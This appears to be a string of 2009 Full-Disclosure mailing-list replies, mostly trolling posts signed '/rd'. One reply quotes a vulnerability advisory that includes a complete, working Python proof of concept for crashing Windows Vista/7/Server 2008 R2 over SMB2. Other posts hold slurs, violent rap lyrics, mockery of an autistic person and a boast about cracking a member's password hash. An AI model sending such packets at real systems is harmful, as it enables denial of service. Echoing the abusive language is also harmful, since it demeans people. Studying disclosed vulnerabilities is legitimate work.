Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
Oh WOW! More exploit code ported to Java!! Hello Randy, Not everyone would have gone to all the trouble you did for me and I want you to know how much I appreciate it. It seems that you are always going above and beyond the call of duty. No wonder so many people are happy and proud to call you an elite h4x0r. It was really wonderful of you to direct port Laurent's SMB2.0 BSOD python exploit code in to Java and call it your own, and I'll never be able to thank you enough. However, in doing so, an apology to Laurent AND the FD list for the dissemination of your Java port and post to FD mailing list is therefore required. There is simply no need for Java in any circumstances, and it is truly a shame to see such a wonderful exploit treated in such a horrendous way. Perhaps if you added, removed or improved the exploit, an apology would not have been required... but you didn't. Thanks for you time, /rd for dem geeks rdy to bounce 'em Ya my number two on some old school DJ Screw You can't arrest me, plus you can't sue This is a message to the laws, tell 'em We hate you I could be tough tell 'em that they shoulda known Tippin down, sittin crooked on my chrome Bookin my phone, findin a chick I wanna bone Like they couldn't stop me I'm bout to pull up at your home, and it's on ... It's fun :-) On Mon, September 14, 2009 12:14 pm, D-vice wrote: You wrote an exploit in java *head explodes* On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux randy_at_procyonlabs.comwrote: After testing my version of the exploit (using Java instead of Python) I tried it against a Windows Server 2008 R2 installation - it went down. http://www.procyonlabs.com/software/smb2_bsoder Randy laurent gaffie wrote: Advisory updated : = - Release date: September 7th, 2009 - Discovered by: Laurent Gaffi� - Severity: High = I. VULNERABILITY - Windows Vista, Server 2008 R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. II. BACKGROUND - Windows vista and newer Windows comes with a new SMB version named SMB2. See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S erver_Message_Block_2.0 for more details. III. DESCRIPTION - [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue: KB942624 (MS07-063) Installing only this specific update on Vista SP0 create the following issue: SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication. IV. PROOF OF CONCEPT - Smb-Bsod.py: #!/usr/bin/python #When SMB2.0 recieve a char in the Process Id High SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = IP_ADDR, 445 buff = ( \x00\x00\x00\x90 # Begin SMB header: Session message \xff\x53\x4d\x42 # Server Component: SMB \x72\x00\x00\x00 # Negociate Protocol \x00\x18\x53\xc8 # Operation 0x18 sub 0xc853 \x00\x26# Process ID High: -- :) normal value should be \x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e \x30\x30\x32\x00 ) s = socket() s.connect(host) s.send(buff) s.close() V. BUSINESS IMPACT - An attacker can remotly crash any Vista/Windows 7 machine with SMB enable. Windows Xp, 2k, are NOT affected as they dont have this driver. VI. SYSTEMS AFFECTED - [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 R2, Windows 7 RC. VII. SOLUTION - No patch available for the moment. Close SMB feature and ports, until a patch is provided. Configure your firewall properly You can also follow the MS Workaround: http://www.microsoft.com/technet/security/advisory/975497.mspx VIII. REFERENCES - http://www.microsoft.com/technet/security/advisory/975497.mspx http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-
Re: [Full-disclosure] VIDEO Global Technocracy - Part 1
prior to posting on FD you should probably... 1.) learn english 2.) learn english 3.) think of a better hacker jargon than BlackThirteen, Dragon Legion, envoy of the Twelve Dragon Elders, Harbinger and Portent of the CyberRevolution 4.) learn english whats even worse (blackthirteen), is that you've actually just joined hak5 (aug 28th) and we've ALREADY stolen and cracked your hash... idiot. now stfu and bounce you geeks... Police think they can see me lean I'm tint so it ain't easy to be seen When you see me ride by they can see the glean And my shine on the deck and the TV screen Ride with a new chick, she like hold up Next to the playstation controller is a full clip and my pistola Turn a jacker into a coma Girl you ain't know, I'm crazy like Krayzie Bone Just tryin to bone ain't tryin to have no babies Rock clean itself so I pull in ladies Laws of patrolling you know they hate me Music turned all the way up until the maximum I can speak for some niggas tryin to jack for some But we packin somethin that we have and um will have a nigga locked up in the maximum Security cell, I'm grippin oak Music loud and tippin slow Twist and twistin like hit this dough Pull up from behind and is in his throat Windows down gotta stop pollution CDs change niggas like who is that producing? This the Play-N-Skillz when we out and cruisin Got warrants in every city except Houston but I'm still ain't losin /rd remember to always r1d3 d1r7y... On Thu, 03 Sep 2009 15:47:04 -0400 William Dyer william.dragonlegion.d...@gmail.com wrote: http://www.youtube.com/watch?v=82yBqYXNKi4 http://www.youtube.com/watch?v=82yBqYXNKi4 Satellites used for general audio and visual observation of the planet. In order to continue our revolution, we must ensure opportunities for maneuver and to communicate with any security. All of this information many of you already know. However, it seems that no one was willing to do all of it. People seem to agree with their fate as prisoners under the Global Grid Control. If you have not understood this war against us as a species and, in particular, hackers. The movement already underway to prevent outside hacking Arts sanctioned public agencies and entities. Take our words as a warning, unless you are against us. What do you stand on the surveillance state? Are you sure you protect will stand behind you, or you meatpuppet in cubefarm? We live in the general Grid Control. From satellites to unmanned aircraft. Cameras on the streets. Our every move is tracked electronically, and every thing we recorded, and generalized and analyzed to predict our next move. You all have heard of cyber-war. Corporation of America raised its NSA is responsible for the security of your computer. Who do you think your enemy? Security officials want the total information awareness. Registered hackers are terrorists, regardless of nationality. Hackers last line of defense human defense against tyranny. If we want to this chance pass us, the lives of our children and future generations will live in slavery, the corporate state. Soon the possibility of creating designer children become a reality. Do you believe in is an elected procedure will be placed on your national health plan, or is more likely that those who have power and money will have access to technology that will enable them to create a physical gap between classes? We are passing from 1984 in a beautiful new world, where it is literally to create groups of people, at genetic level. What should you do now? The end of the process of full disclosure. Develop your exploits and create 0days. Do not release them at will. When the time comes, you'll know what to do. Use your appliances in the strategic plan. We strive to provide the direction of the script kiddies, and just hate the white hats as they close their eyes they are actually wolves in sheeples clothes. This is not just about China, or Iran, or the Corporate States of America or the English government oversight, or Australia, or Russia, or any particular location hampered technocrats. fear to read scary thought I am afraid even that your forum because you already have not you fear You agree that all this is happening, and nothing here has helped blackthirteen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday
why would anyone write a 0day with... # bug found exploited by Kingcope, kcope2atgooglemail.com # Affects IIS6 with stack cookie protection # August 2009 - KEEP THIS 0DAY PRIV8 ... then plaster it all over the internet? have you forgotten what you, yourself wrote? if you guys really wanna get that famous.. perhaps you should consider a new career - nobody even likes h4ck3rs these days anyway (especially james and da internet po-po). and please put a fkn' sleep in ur while(1)'s after a fork()... it appears as though you couldn't WAIT to get this one out... /rd remember to always r1d3 d1r7y n' bounce em. On Mon, 31 Aug 2009 16:31:51 -0400 Kingcope kco...@googlemail.com wrote: Hello list, I have to clarify some things on the globbing vulnerability here. The posted PoC (with the fine art) does NOT exploit IIS6 ftp servers, IIS6 ftp server IS affected by the buffer overflow but is properly protected by stack canaries. AFAIK it looks like a DoS on Windows Server 2003. Until someone finds a way to bypass Stack Canaries on recent Windows versions this remains a DoS on IIS6. Thanks to HD Moore and all people in the past you wrote exploits for my releases! Kudos! Nikolaos 2009/8/31 Kingcope kco...@googlemail.com: (see attachment) Cheerio, Kingcope ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Moar iProphet questions
james.. you cholo typin' mother fucker... what did i tell you...
nobody has time for da internet p0-p0 here..
now sing it.. n bounce dem b00bies you lil geeks.
They see me rollin'
They hatin patrollin and tryna catch me ridin dirty
Tryna catch me ridin dirty (*4X*)
My music so loud I'm swangin
They hopin' that they gone catch me ridin dirty
Tryna catch me ridin dirty (*4X*)
chaaa gurls...
/rd
On Sat, 29 Aug 2009 13:21:07 -0400 jamesleesmit...@aol.co.uk
jamesleesmit...@aol.co.uk wrote:
Now even the real name people are trolling.
James
-Original Message-
From: Gichuki John Chuksjonia chuksjo...@gmail.com
To: Gary McKinnon john.wall...@hush.com
Cc: full-disclosure@lists.grok.org.uk
Sent: Sat, Aug 29, 2009 4:37 pm
Subject: Re: [Full-disclosure] Moar iProphet questions
Now, i think this is really wrong. There is no need of making fun
of
someone who is disabled by attacking n3td3v.
On 8/29/09, Gary McKinnon john.wall...@hush.com wrote:
iProphet (weev) Questions
Sorry for being repetitive. FD is mostly hoarsechit and fucin
around anyway (not that you do ANY of that).
My name is Gary McKinnon, I'm the nerd that hacked into the
Pentagon. I'm autistic so I may have difficulty communicating or
understanding you.
HELLO? Can you hear me?
I CAN'T SEE THE SCREEN. LET ME TRY TO TYPE SOME QUEStions
8==^H^H^H^H^HD
1.) Do you have HIV?
2.) Have you ever anointed anyone with your IRL Virus?
3.) Do you think that you could be prosecuted for hacking if you
give people your IRL badware?
4.) Do the woman you give HIV to go to heaven?
5.) What does your computer screen look like? You run linux? Do
you
have an iProphet wallpaper?
6.) When will we be seeing new vlogcasts
7.) Do you plan on writing some subversive PDF's for us?
8.) Do you intend on making a documentary so it can go viral and
cause a revolution?
9.) In your mind, what is your picture of an ideal world?
This post was by Gary McKinnon [SOLO], elite autistic hacker.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
--
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com
{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Time to stop this non-sense
who are you the n3td3v internet police? stfu. ... and where is the new antisec PHHEER zine? its uber long overdue. /rd good day n00bsauce. On Fri, 28 Aug 2009 10:25:41 -0400 jamesleesmit...@aol.co.uk jamesleesmit...@aol.co.uk wrote: Hi I suggest whoever is trying to give n3td3v a bad name stop. James ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
